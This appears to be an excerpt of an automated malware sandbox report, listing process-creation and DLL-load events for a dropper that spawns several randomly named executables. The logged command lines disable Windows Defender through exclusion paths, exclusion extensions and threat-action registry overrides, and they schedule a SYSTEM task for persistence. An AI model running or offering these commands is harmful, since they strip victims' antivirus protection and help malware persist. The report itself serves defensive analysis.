Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8028 -ip 8028
Source: C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8028 -s 356
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe "C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe" /s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe "C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe "C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe "C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe "C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Process created: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe .\Install.exe /odidum "385118" /S
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8028 -ip 8028
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8028 -s 356
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Section loaded: icu.dll	Jump to behavior
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: userenv.dll	Jump to behavior
